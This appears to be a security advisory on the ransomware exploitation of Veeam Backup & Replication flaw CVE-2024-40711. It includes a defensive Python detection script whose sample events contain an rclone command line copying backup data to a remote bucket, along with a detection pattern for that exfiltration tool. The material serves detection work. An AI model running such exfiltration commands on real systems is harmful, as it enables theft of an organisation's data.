October 11, 2024
Severity
High
Analysis Summary
Ransomware groups are actively exploiting a serious security flaw that allows remote code execution (RCE) on unpatched Veeam Backup & Replication (VBR) servers.
The vulnerability, now tracked as CVE-2024-40711, was found by researchers to stem from a deserialization of untrusted data weakness that unauthenticated threat actors can exploit in low-complexity attacks. Veeam disclosed the vulnerability and issued security fixes on September 4, and researchers published a technical analysis on September 9. To give administrators enough time to secure their servers, the researchers held back the proof-of-concept exploit code until September 15.
The delay was warranted because businesses rely on Veeam's VBR software to back up, restore, and replicate cloud, virtual, and physical machines as a disaster recovery and data protection solution. That role makes VBR a very attractive target for threat actors seeking rapid access to a company's backup data.
Over the past month, incident responders observed Akira and Fog ransomware attacks in which the CVE-2024-40711 RCE vulnerability was exploited shortly after disclosure and combined with previously compromised credentials to create a local account named "point" and add it to the local Administrators and Remote Desktop Users groups. In one case the attackers deployed the Fog ransomware; in another attack during the same period they attempted to spread the Akira ransomware. In all four cases, the indicators match earlier Akira and Fog ransomware intrusions.
In every case, the attackers gained initial access through compromised VPN gateways that did not have multifactor authentication enabled, and some of these VPNs were running unsupported software versions. In the Fog ransomware incident, the attacker deployed the ransomware on an unprotected Hyper-V server and then used the rclone utility to exfiltrate data.
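The post-exploitation chain described above (a fresh local account added to Administrators and Remote Desktop Users, followed by rclone activity) leaves a recognisable trail in the Windows Security log. The following detection logic is an added example written for this advisory, not code from Veeam or from the researchers cited; it correlates account-creation (4720) and group-membership (4732) events on the same host within a short window and flags process-creation (4688) events that mention rclone. The event records are constructed samples in a simplified dict form, and the host and account names are made up.

```python
"""Added example (not from the advisory): detection logic for the
post-exploitation steps described above, run over constructed sample
events. Event records are a simplified dict form of Windows Security
log fields; the field names are this example's own convention."""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Well-known SIDs of the two local groups the attackers added their account to.
PRIVILEGED_GROUP_SIDS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-555": "Remote Desktop Users",
}
ACCOUNT_CREATED = 4720   # Security event: a user account was created
MEMBER_ADDED = 4732      # Security event: member added to a security-enabled local group
PROCESS_CREATED = 4688   # Security event: a new process has been created


@dataclass
class Alert:
    rule: str
    host: str
    account: str
    detail: str


def detect_new_privileged_account(events, window=timedelta(minutes=30)):
    """Flag a 4720 followed within `window` by a 4732 into Administrators or
    Remote Desktop Users on the same host for the same account."""
    alerts = []
    created = {}  # (host, account) -> creation time
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == ACCOUNT_CREATED:
            created[(ev["host"], ev["account"].lower())] = t
        elif ev["id"] == MEMBER_ADDED and ev.get("group_sid") in PRIVILEGED_GROUP_SIDS:
            t0 = created.get((ev["host"], ev["account"].lower()))
            if t0 is not None and t - t0 <= window:
                group = PRIVILEGED_GROUP_SIDS[ev["group_sid"]]
                alerts.append(Alert("new-account-added-to-privileged-group", ev["host"], ev["account"],
                                    f"created {t0.isoformat()}, added to {group} by {ev['subject']}"))
    return alerts


def detect_rclone(events):
    """Simple heuristic: any process creation whose image path or command line
    mentions rclone. A renamed binary with a renamed config file would evade
    this, so pair it with the EDR and network-monitoring controls listed under
    Remediation."""
    alerts = []
    for ev in events:
        if ev["id"] != PROCESS_CREATED:
            continue
        text = (ev.get("image", "") + " " + ev.get("cmdline", "")).lower()
        if "rclone" in text:
            alerts.append(Alert("rclone-execution", ev["host"], ev["subject"], ev.get("cmdline", "")))
    return alerts


def run_detection(events):
    """Run both rules and return the combined alert list."""
    return detect_new_privileged_account(events) + detect_rclone(events)


# Constructed sample events (not real log data); hosts and accounts are made up.
SAMPLE_EVENTS = [
    {"time": "2024-10-01T10:00:00", "id": 4720, "host": "VBR01", "subject": "veeam_svc", "account": "point"},
    {"time": "2024-10-01T10:02:00", "id": 4732, "host": "VBR01", "subject": "veeam_svc", "account": "point", "group_sid": "S-1-5-32-544"},
    {"time": "2024-10-01T10:03:00", "id": 4732, "host": "VBR01", "subject": "veeam_svc", "account": "point", "group_sid": "S-1-5-32-555"},
    # Benign: long-standing account promoted, no 4720 in the window.
    {"time": "2024-10-01T10:05:00", "id": 4732, "host": "VBR01", "subject": "admin", "account": "helpdesk", "group_sid": "S-1-5-32-544"},
    # Benign: account created in the morning, promoted hours later (outside the 30-minute window).
    {"time": "2024-10-01T09:00:00", "id": 4720, "host": "WS22", "subject": "admin", "account": "intern"},
    {"time": "2024-10-01T12:00:00", "id": 4732, "host": "WS22", "subject": "admin", "account": "intern", "group_sid": "S-1-5-32-555"},
    # Exfiltration stage on the Hyper-V host: renamed binary, but the config path still gives it away.
    {"time": "2024-10-01T11:30:00", "id": 4688, "host": "HV01", "subject": "point",
     "image": r"C:\Users\Public\rc.exe",
     "cmdline": r"rc.exe copy D:\Backups remote:bucket --config C:\Users\Public\rclone.conf"},
]

if __name__ == "__main__":
    for a in run_detection(SAMPLE_EVENTS):
        print(f"[{a.rule}] host={a.host} account={a.account}: {a.detail}")
```

Run against the sample, the account rule fires twice for "point" on VBR01 (once per privileged group) and the rclone rule fires once on HV01; the helpdesk promotion and the slow intern promotion produce no alerts. In production, the same logic would consume 4720/4732/4688 records from a SIEM, and the 30-minute window should be tuned to the environment's normal account-provisioning cadence.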
Veeam also patched a high-severity vulnerability (CVE-2023-27532) in the Backup & Replication software on March 7, 2023; it can be used to compromise backup infrastructure hosts. A few weeks later, in late March, a Finnish cybersecurity and privacy company attributed attacks exploiting CVE-2023-27532 to the financially motivated FIN7 threat group, known for its connections to the Conti, REvil, Maze, Egregor, and BlackBasta ransomware operations.
A few months later, the same Veeam VBR exploit was used in Cuba ransomware attacks against Latin American IT organizations and critical U.S. infrastructure. According to the company, over 550,000 customers worldwide, including at least 74% of all Global 2000 firms, use Veeam's solutions.
Impact
- Code Execution
- Unauthorized Access
- Sensitive Data Theft
- Financial Loss
Indicators of Compromise
CVE
- CVE-2024-40711
Affected Vendors
- Veeam
Affected Products
- Veeam Backup and Recovery - 12.1.2
Remediation
- Refer to the Veeam Knowledge Base for patch, upgrade, or suggested workaround information.
- Implement robust multi-layered security measures to detect and respond to ransomware and cyber espionage activities.
- Conduct regular security assessments and penetration testing to identify and mitigate vulnerabilities in critical infrastructure and government systems.
- Deploy advanced threat detection tools, such as Endpoint Detection and Response (EDR) and Network Traffic Analysis (NTA), to monitor for suspicious activities and anomalies.
- Ensure timely patching and updating of all software and systems to close known security gaps.
- Use multi-factor authentication (MFA) and strong password policies to protect user accounts from unauthorized access.
- Segment networks to limit lateral movement within the organization in case of a breach.
- Develop and maintain an incident response plan that includes procedures for ransomware attacks and data breaches.
- Train employees on cybersecurity best practices and phishing awareness to reduce the risk of social engineering attacks.
- Regularly back up critical data and ensure backups are stored securely and are not accessible from the primary network.
- Collaborate with cybersecurity firms and government agencies for threat intelligence sharing and coordinated defense strategies.
- Implement encryption for sensitive data at rest and in transit to protect against data theft.
- Limit access to critical systems and data to only those individuals who require it for their role.
- Monitor for and immediately investigate the presence of known malware and indicators of compromise associated with state-sponsored groups.
- Engage in regular cybersecurity drills and exercises to ensure readiness for potential cyber incidents.
- Ensure legal and compliance measures are in place, particularly for industries subject to specific regulatory requirements.